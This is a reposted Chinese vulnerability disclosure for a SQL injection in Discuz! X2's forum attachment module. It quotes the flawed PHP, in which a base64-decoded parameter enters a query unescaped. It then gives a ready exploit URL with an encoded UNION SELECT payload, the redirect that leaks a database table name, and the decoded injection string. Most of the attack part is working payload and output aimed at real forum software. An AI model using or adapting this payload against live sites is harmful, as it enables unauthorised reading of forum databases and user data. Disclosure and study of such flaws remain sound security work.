Discuz! X2 SQL 注射漏洞,支持 Union!

admin 2021年4月3日19:41:17评论56 views字数 1303阅读4分20秒阅读模式

Discuz! X2 SQL 注射漏洞,支持 Union!

漏洞hash:806b86e8290211c9b6ad50a18d667e08
文件:sourcemoduleforumforum_attachment.php
 
 
详细:

if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));

if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);
}

变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。

http://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D

转向后网址 

http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

暴出表名 pre_common_admincp_member

实际查询为:

$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));文章来源于lcx.cc:Discuz! X2 SQL 注射漏洞,支持 Union!

相关推荐: 深喉CMS密码加密简要解析

0x01 代码分析 php版加密函数所在文件路径 %wwwRoot%Deepthroatincclass.shlencryption.php 代码(加了一点注释):

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:41:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz! X2 SQL 注射漏洞,支持 Union!https://cn-sec.com/archives/324384.html

发表评论

匿名网友 填写信息